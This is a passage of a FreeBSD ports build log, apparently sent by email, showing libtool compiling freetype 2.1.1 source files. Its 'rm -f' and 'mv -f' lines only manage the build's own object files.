/usr/ports/print/free= type2/work/freetype-2.1.1/objs/ftdebug.lo /usr/ports/print/freetype2/work/f= reetype-2.1.1/src/base/ftdebug.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftdebug.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe /usr/ports/print/freetype2/work/freety= pe-2.1.1/src/base/ftdebug.c -fPIC -DPIC -o /usr/ports/print/freetype2/work= /freetype-2.1.1/objs/.libs/ftdebug.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe /usr/ports/print/freetype2/work/freety= pe-2.1.1/src/base/ftdebug.c -o /usr/ports/print/freetype2/work/freetype-2.1= .1/objs/ftdebug.o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftdebug.lo = /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftdebug.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -o /usr/ports/print/free= type2/work/freetype-2.1.1/objs/ftinit.lo /usr/ports/print/freetype2/work/fr= eetype-2.1.1/src/base/ftinit.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftinit.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe /usr/ports/print/freetype2/work/freety= pe-2.1.1/src/base/ftinit.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/= freetype-2.1.1/objs/.libs/ftinit.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe /usr/ports/print/freetype2/work/freety= pe-2.1.1/src/base/ftinit.c -o /usr/ports/print/freetype2/work/freetype-2.1.= 1/objs/ftinit.o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftinit.lo /= usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftinit.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/base -o /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/ftbase.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/= base/ftbase.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftbase.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftbase.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/ob= js/.libs/ftbase.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftbase.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbase.o >= /dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftbase.lo /= usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbase.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/base -o /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/ftglyph.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src= /base/ftglyph.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftglyph.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftglyph.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/o= bjs/.libs/ftglyph.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftglyph.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftglyph.o= >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftglyph.lo = /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftglyph.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/base -o /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/ftmm.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/ba= se/ftmm.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftmm.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftmm.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs= /.libs/ftmm.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftmm.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftmm.o >/dev= /null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftmm.lo /us= r/ports/print/freetype2/work/freetype-2.1.1/objs/ftmm.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/base -o /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/ftbdf.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/b= ase/ftbdf.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftbdf.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftbdf.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/obj= s/.libs/ftbdf.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftbdf.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbdf.o >/d= ev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftbdf.lo /u= sr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbdf.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/base -o /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/fttype1.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src= /base/fttype1.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/fttype1.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /fttype1.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/o= bjs/.libs/fttype1.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /fttype1.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/fttype1.o= >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/fttype1.lo = /usr/ports/print/freetype2/work/freetype-2.1.1/objs/fttype1.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/base -o /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/ftxf86.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/= base/ftxf86.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftxf86.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftxf86.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/ob= js/.libs/ftxf86.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftxf86.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftxf86.o >= /dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftxf86.lo /= usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftxf86.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/base -o /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/ftbbox.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/= base/ftbbox.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftbbox.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftbbox.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/ob= js/.libs/ftbbox.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/base /usr/ports/print/freetype2/work/freetype-2.1.1/src/base= /ftbbox.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbbox.o >= /dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftbbox.lo /= usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbbox.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/autohint -o /usr/ports/print/freetype2/work/fr= eetype-2.1.1/objs/autohint.lo /usr/ports/print/freetype2/work/freetype-2.1.= 1/src/autohint/autohint.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/autohint.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/autohint /usr/ports/print/freetype2/work/freetype-2.1.1/src/= autohint/autohint.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetyp= e-2.1.1/objs/.libs/autohint.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/autohint /usr/ports/print/freetype2/work/freetype-2.1.1/src/= autohint/autohint.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/= autohint.o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/autohint.lo= /usr/ports/print/freetype2/work/freetype-2.1.1/objs/autohint.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/bdf -o /usr/ports/print/freetype2/work/freetyp= e-2.1.1/objs/bdf.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/bdf/= bdf.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/bdf.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/bdf /usr/ports/print/freetype2/work/freetype-2.1.1/src/bdf/b= df.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.l= ibs/bdf.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/bdf /usr/ports/print/freetype2/work/freetype-2.1.1/src/bdf/b= df.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/bdf.o >/dev/nul= l 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/bdf.lo /usr= /ports/print/freetype2/work/freetype-2.1.1/objs/bdf.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/cache -o /usr/ports/print/freetype2/work/freet= ype-2.1.1/objs/ftcache.lo /usr/ports/print/freetype2/work/freetype-2.1.1/sr= c/cache/ftcache.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftcache.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/cache /usr/ports/print/freetype2/work/freetype-2.1.1/src/cac= he/ftcache.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1= /objs/.libs/ftcache.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/cache /usr/ports/print/freetype2/work/freetype-2.1.1/src/cac= he/ftcache.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftcache= .o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftcache.lo = /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftcache.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/cff -o /usr/ports/print/freetype2/work/freetyp= e-2.1.1/objs/cff.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/cff/= cff.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/cff.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/cff /usr/ports/print/freetype2/work/freetype-2.1.1/src/cff/c= ff.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.l= ibs/cff.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/cff /usr/ports/print/freetype2/work/freetype-2.1.1/src/cff/c= ff.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/cff.o >/dev/nul= l 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/cff.lo /usr= /ports/print/freetype2/work/freetype-2.1.1/objs/cff.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/cid -o /usr/ports/print/freetype2/work/freetyp= e-2.1.1/objs/type1cid.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src= /cid/type1cid.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/type1cid.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/cid /usr/ports/print/freetype2/work/freetype-2.1.1/src/cid/t= ype1cid.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/ob= js/.libs/type1cid.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/cid /usr/ports/print/freetype2/work/freetype-2.1.1/src/cid/t= ype1cid.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/type1cid.o= >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/type1cid.lo= /usr/ports/print/freetype2/work/freetype-2.1.1/objs/type1cid.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/pcf -o /usr/ports/print/freetype2/work/freetyp= e-2.1.1/objs/pcf.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/pcf/= pcf.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/pcf.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/pcf /usr/ports/print/freetype2/work/freetype-2.1.1/src/pcf/p= cf.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.l= ibs/pcf.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/pcf /usr/ports/print/freetype2/work/freetype-2.1.1/src/pcf/p= cf.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/pcf.o >/dev/nul= l 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/pcf.lo /usr= /ports/print/freetype2/work/freetype-2.1.1/objs/pcf.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/pfr -o /usr/ports/print/freetype2/work/freetyp= e-2.1.1/objs/pfr.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/pfr/= pfr.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/pfr.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/pfr /usr/ports/print/freetype2/work/freetype-2.1.1/src/pfr/p= fr.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.l= ibs/pfr.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/pfr /usr/ports/print/freetype2/work/freetype-2.1.1/src/pfr/p= fr.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/pfr.o >/dev/nul= l 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/pfr.lo /usr= /ports/print/freetype2/work/freetype-2.1.1/objs/pfr.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/psaux -o /usr/ports/print/freetype2/work/freet= ype-2.1.1/objs/psaux.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/= psaux/psaux.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/psaux.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/psaux /usr/ports/print/freetype2/work/freetype-2.1.1/src/psa= ux/psaux.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/o= bjs/.libs/psaux.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/psaux /usr/ports/print/freetype2/work/freetype-2.1.1/src/psa= ux/psaux.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/psaux.o >= /dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/psaux.lo /u= sr/ports/print/freetype2/work/freetype-2.1.1/objs/psaux.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/pshinter -o /usr/ports/print/freetype2/work/fr= eetype-2.1.1/objs/pshinter.lo /usr/ports/print/freetype2/work/freetype-2.1.= 1/src/pshinter/pshinter.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/pshinter.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/pshinter /usr/ports/print/freetype2/work/freetype-2.1.1/src/= pshinter/pshinter.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetyp= e-2.1.1/objs/.libs/pshinter.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/pshinter /usr/ports/print/freetype2/work/freetype-2.1.1/src/= pshinter/pshinter.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/= pshinter.o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/pshinter.lo= /usr/ports/print/freetype2/work/freetype-2.1.1/objs/pshinter.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= 